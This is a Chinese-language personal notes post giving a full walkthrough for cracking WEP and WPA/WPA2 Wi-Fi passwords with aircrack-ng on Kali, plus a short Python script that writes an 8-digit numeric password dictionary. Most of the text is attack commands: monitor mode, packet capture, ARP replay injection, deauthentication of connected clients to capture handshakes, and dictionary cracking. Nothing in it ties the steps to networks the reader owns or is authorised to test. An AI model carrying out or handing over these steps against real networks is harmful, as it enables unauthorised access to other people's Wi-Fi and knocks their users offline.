【个人笔记】kali工具aircark-ng破解无线密码(附python生成字典程序)

aircrack-ng破解WEP加密
虚拟机里启用外加无线网卡
用ifconfig -a看有没有wlan0
airmon-ng start wlan0
//将网卡设置为监听模式,他会给你一个临时的适配器mon0
用airmon-ng查看自己启动的网卡名字,教程了是mon0
airodump-ng mon0
//抓包,可以找到各个wifi和BSSID等信息
airodump-ng -c 1 -w lesson01 mon0
//-c:指定信道,-w:保存你名字
airodump-ng --ivs -c 11 -w test01 mon0
//跟上一个一样,抓包 ,保存数据用于分析,但是太慢了,所以需要ARP注入攻击
//重新开一个进程
aireplay-ng -3 -b 后面接相对应的mac地址 -e 接wifi名字 --ignore-negative-one mon0
//–ignore-negative-one mon0是为了忽略负信道,这不是在ARP攻击,而是在进行ARP请求,等待别人用网,再注入攻击
//十万Frames大概就可以破解
aircrack-ng lesson01-01.ivs
//查看你有多少WEP的IVs,一般两万以上
选择AP,第一个就行:输入1回车就行

aircrack-ng破解WPA、WPA2加密
wpa加密只能通过抓取握手包暴力破解

1。将网卡设置为监听模式
airmon-ng start wlan0
2.扫描
airodump-ng mon0
3.找到目标wifi的信道ch,就去其信道抓包,退出,输入新的命令行
airodump-ng -c 1 -w lesson04 mon0
4.新开一个终端,进行取消洪水验证攻击:取消与客户端的连接,重新连接时候进行抓包
aireplay-ng -0 10 -a 后面接目标AP的mac地址(BSSID) -c后面接客户端mac地址(STATION)-e 接wifi名字 --ignore-negative-one mon0
//他会把设备不停的挤掉线,掉线但是不会显示出来
可以不需要-e和后面内容,直接接网卡名称
5.在上一个抓包进程中输入
aircrack-ng -w/root/Desktop/pass lesson04-01.cap
-w是指定字典,pass就是字典``
//可以看见是否目标AP抓到握手包
6.选择目标Ap
2
则成功

附带python生成密码本

import itertools as its
words = "1234567890"
r = its.product(words,repeat=8)#生成一个8位密码本
print(r)
file = open("pass.txt","a")
for i in r:
	print(i)
	file.write("".join(i))
	file.write("".join("\n"))

你可能感兴趣的:(kali)